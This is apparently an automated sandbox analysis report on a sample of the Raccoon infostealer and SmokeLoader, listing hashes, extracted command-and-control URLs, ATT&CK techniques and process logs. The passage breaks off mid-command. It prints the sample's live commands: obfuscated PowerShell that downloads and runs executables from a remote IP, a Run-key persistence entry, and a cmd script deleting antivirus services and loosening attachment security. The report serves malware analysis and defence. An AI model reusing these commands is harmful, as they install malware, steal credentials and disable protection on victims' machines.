raccoon | cce6188efa2820773071b644fec917c57d553da1d0f4571b7056b6aaf2f11249

Analysis

max time kernel
152s
max time network
151s
platform
windows10_x64
resource
win10v20210410
submitted
13-08-2021 14:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1bbe3a3f1efad030be690f626257483a.exe
Size

180KB
MD5

1bbe3a3f1efad030be690f626257483a
SHA1

06d2221210b3ff3336a5dade2e43d689697e8002
SHA256

cce6188efa2820773071b644fec917c57d553da1d0f4571b7056b6aaf2f11249
SHA512

63f6f76b7181f2fd6f88e161c8cd5f99da2197e2845d382628a890099e3bd99e8a85a6d1981961ad01383da10995223ba030531cea3561afa0e3752a1d51cbf4

Score

10^/10

raccoon smokeloader 471c70de3b4f9e4d493e418d1f60a90659057de0 cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor evasion persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://193.56.146.55/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1292-139-0x00000000048B0000-0x0000000004941000-memory.dmp	family_raccoon
behavioral2/memory/1292-140-0x0000000000400000-0x0000000002CA9000-memory.dmp	family_raccoon
behavioral2/memory/1300-220-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon
behavioral2/memory/1300-221-0x000000000044003F-mapping.dmp	family_raccoon
behavioral2/memory/1300-233-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 1928 created 1292 1928 WerFault.exe 8247.exe
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

24 2884 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

7DFF.exe7F77.exe8247.exeRuntimebroker.exe7F77.exe

pid process

8 7DFF.exe
4088 7F77.exe
1292 8247.exe
3844 Runtimebroker.exe
1300 7F77.exe
Deletes itself 1 IoCs

Processes:

pid process

2984
Drops startup file 1 IoCs

Processes:

Runtimebroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe
Loads dropped DLL 1 IoCs

Processes:

7F77.exe

pid process

1300 7F77.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

description	pid	process	target process
PID 1928 created 1292	1928	WerFault.exe	8247.exe

flow	pid	process
24	2884	powershell.exe

pid	process
8	7DFF.exe
4088	7F77.exe
1292	8247.exe
3844	Runtimebroker.exe
1300	7F77.exe

pid	process
2984

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

pid	process
1300	7F77.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

1bbe3a3f1efad030be690f626257483a.exe7F77.exe

description	pid	process	target process
PID 3788 set thread context of 2364	3788	1bbe3a3f1efad030be690f626257483a.exe	1bbe3a3f1efad030be690f626257483a.exe
PID 4088 set thread context of 1300	4088	7F77.exe	7F77.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3924	8	WerFault.exe	7DFF.exe
3692	8	WerFault.exe	7DFF.exe
2788	8	WerFault.exe	7DFF.exe
2892	1292	WerFault.exe	8247.exe
2772	8	WerFault.exe	7DFF.exe
1964	1292	WerFault.exe	8247.exe
2128	8	WerFault.exe	7DFF.exe
3024	1292	WerFault.exe	8247.exe
3768	8	WerFault.exe	7DFF.exe
3272	1292	WerFault.exe	8247.exe
1928	1292	WerFault.exe	8247.exe
2336	3844	WerFault.exe	Runtimebroker.exe
868	3844	WerFault.exe	Runtimebroker.exe
1520	3844	WerFault.exe	Runtimebroker.exe
4016	3844	WerFault.exe	Runtimebroker.exe
212	3844	WerFault.exe	Runtimebroker.exe
428	3844	WerFault.exe	Runtimebroker.exe
3788	1300	WerFault.exe	7F77.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1bbe3a3f1efad030be690f626257483a.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1bbe3a3f1efad030be690f626257483a.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1bbe3a3f1efad030be690f626257483a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1bbe3a3f1efad030be690f626257483a.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

1bbe3a3f1efad030be690f626257483a.exe

pid	process
2364	1bbe3a3f1efad030be690f626257483a.exe
2364	1bbe3a3f1efad030be690f626257483a.exe
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2984
Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

1bbe3a3f1efad030be690f626257483a.exe

pid process

2364 1bbe3a3f1efad030be690f626257483a.exe
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984
2984

pid	process
2984

Suspicious use of AdjustPrivilegeToken 39 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	3692	WerFault.exe
Token: SeDebugPrivilege	2788	WerFault.exe
Token: SeDebugPrivilege	2892	WerFault.exe
Token: SeDebugPrivilege	2772	WerFault.exe
Token: SeDebugPrivilege	1964	WerFault.exe
Token: SeDebugPrivilege	2128	WerFault.exe
Token: SeDebugPrivilege	3024	WerFault.exe
Token: SeDebugPrivilege	3768	WerFault.exe
Token: SeDebugPrivilege	3272	WerFault.exe
Token: SeDebugPrivilege	1928	WerFault.exe
Token: SeDebugPrivilege	2336	WerFault.exe
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984
Token: SeDebugPrivilege	868	WerFault.exe
Token: SeDebugPrivilege	1520	WerFault.exe
Token: SeDebugPrivilege	4016	WerFault.exe
Token: SeDebugPrivilege	212	WerFault.exe
Token: SeDebugPrivilege	428	WerFault.exe
Token: SeDebugPrivilege	3544	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	4088	7F77.exe
Token: SeDebugPrivilege	2336	powershell.exe
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984
Token: SeDebugPrivilege	3788	WerFault.exe
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984
Token: SeShutdownPrivilege	2984
Token: SeCreatePagefilePrivilege	2984

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2984

pid	process
2984

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1bbe3a3f1efad030be690f626257483a.exe7DFF.exeRuntimebroker.exe7F77.exe

description	pid	process	target process
PID 3788 wrote to memory of 2364	3788	1bbe3a3f1efad030be690f626257483a.exe	1bbe3a3f1efad030be690f626257483a.exe
PID 3788 wrote to memory of 2364	3788	1bbe3a3f1efad030be690f626257483a.exe	1bbe3a3f1efad030be690f626257483a.exe
PID 3788 wrote to memory of 2364	3788	1bbe3a3f1efad030be690f626257483a.exe	1bbe3a3f1efad030be690f626257483a.exe
PID 3788 wrote to memory of 2364	3788	1bbe3a3f1efad030be690f626257483a.exe	1bbe3a3f1efad030be690f626257483a.exe
PID 3788 wrote to memory of 2364	3788	1bbe3a3f1efad030be690f626257483a.exe	1bbe3a3f1efad030be690f626257483a.exe
PID 3788 wrote to memory of 2364	3788	1bbe3a3f1efad030be690f626257483a.exe	1bbe3a3f1efad030be690f626257483a.exe
PID 2984 wrote to memory of 8	2984		7DFF.exe
PID 2984 wrote to memory of 8	2984		7DFF.exe
PID 2984 wrote to memory of 8	2984		7DFF.exe
PID 2984 wrote to memory of 4088	2984		7F77.exe
PID 2984 wrote to memory of 4088	2984		7F77.exe
PID 2984 wrote to memory of 4088	2984		7F77.exe
PID 2984 wrote to memory of 1292	2984		8247.exe
PID 2984 wrote to memory of 1292	2984		8247.exe
PID 2984 wrote to memory of 1292	2984		8247.exe
PID 2984 wrote to memory of 1116	2984		explorer.exe
PID 2984 wrote to memory of 1116	2984		explorer.exe
PID 2984 wrote to memory of 1116	2984		explorer.exe
PID 2984 wrote to memory of 1116	2984		explorer.exe
PID 2984 wrote to memory of 3352	2984		explorer.exe
PID 2984 wrote to memory of 3352	2984		explorer.exe
PID 2984 wrote to memory of 3352	2984		explorer.exe
PID 2984 wrote to memory of 3088	2984		explorer.exe
PID 2984 wrote to memory of 3088	2984		explorer.exe
PID 2984 wrote to memory of 3088	2984		explorer.exe
PID 2984 wrote to memory of 3088	2984		explorer.exe
PID 8 wrote to memory of 3844	8	7DFF.exe	Runtimebroker.exe
PID 8 wrote to memory of 3844	8	7DFF.exe	Runtimebroker.exe
PID 8 wrote to memory of 3844	8	7DFF.exe	Runtimebroker.exe
PID 2984 wrote to memory of 2220	2984		explorer.exe
PID 2984 wrote to memory of 2220	2984		explorer.exe
PID 2984 wrote to memory of 2220	2984		explorer.exe
PID 2984 wrote to memory of 1216	2984		explorer.exe
PID 2984 wrote to memory of 1216	2984		explorer.exe
PID 2984 wrote to memory of 1216	2984		explorer.exe
PID 2984 wrote to memory of 1216	2984		explorer.exe
PID 2984 wrote to memory of 3592	2984		explorer.exe
PID 2984 wrote to memory of 3592	2984		explorer.exe
PID 2984 wrote to memory of 3592	2984		explorer.exe
PID 2984 wrote to memory of 2744	2984		explorer.exe
PID 2984 wrote to memory of 2744	2984		explorer.exe
PID 2984 wrote to memory of 2744	2984		explorer.exe
PID 2984 wrote to memory of 2744	2984		explorer.exe
PID 2984 wrote to memory of 3400	2984		explorer.exe
PID 2984 wrote to memory of 3400	2984		explorer.exe
PID 2984 wrote to memory of 3400	2984		explorer.exe
PID 2984 wrote to memory of 3004	2984		explorer.exe
PID 2984 wrote to memory of 3004	2984		explorer.exe
PID 2984 wrote to memory of 3004	2984		explorer.exe
PID 2984 wrote to memory of 3004	2984		explorer.exe
PID 3844 wrote to memory of 3544	3844	Runtimebroker.exe	powershell.exe
PID 3844 wrote to memory of 3544	3844	Runtimebroker.exe	powershell.exe
PID 3844 wrote to memory of 3544	3844	Runtimebroker.exe	powershell.exe
PID 3844 wrote to memory of 2884	3844	Runtimebroker.exe	powershell.exe
PID 3844 wrote to memory of 2884	3844	Runtimebroker.exe	powershell.exe
PID 3844 wrote to memory of 2884	3844	Runtimebroker.exe	powershell.exe
PID 4088 wrote to memory of 1300	4088	7F77.exe	7F77.exe
PID 4088 wrote to memory of 1300	4088	7F77.exe	7F77.exe
PID 4088 wrote to memory of 1300	4088	7F77.exe	7F77.exe
PID 4088 wrote to memory of 1300	4088	7F77.exe	7F77.exe
PID 4088 wrote to memory of 1300	4088	7F77.exe	7F77.exe
PID 4088 wrote to memory of 1300	4088	7F77.exe	7F77.exe
PID 4088 wrote to memory of 1300	4088	7F77.exe	7F77.exe
PID 4088 wrote to memory of 1300	4088	7F77.exe	7F77.exe

C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe
"C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3788

C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe
"C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2364

C:\Users\Admin\AppData\Local\Temp\7DFF.exe
C:\Users\Admin\AppData\Local\Temp\7DFF.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:8

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 788
2⤵
- Program crash
PID:3924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 824
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 760
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 912
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 828
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2128

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 924
2⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\ProgramData\Runtimebroker.exe
"C:\ProgramData\Runtimebroker.exe"
2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:3844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 732
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 784
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 764
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 796
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 992
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 1016
3⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add 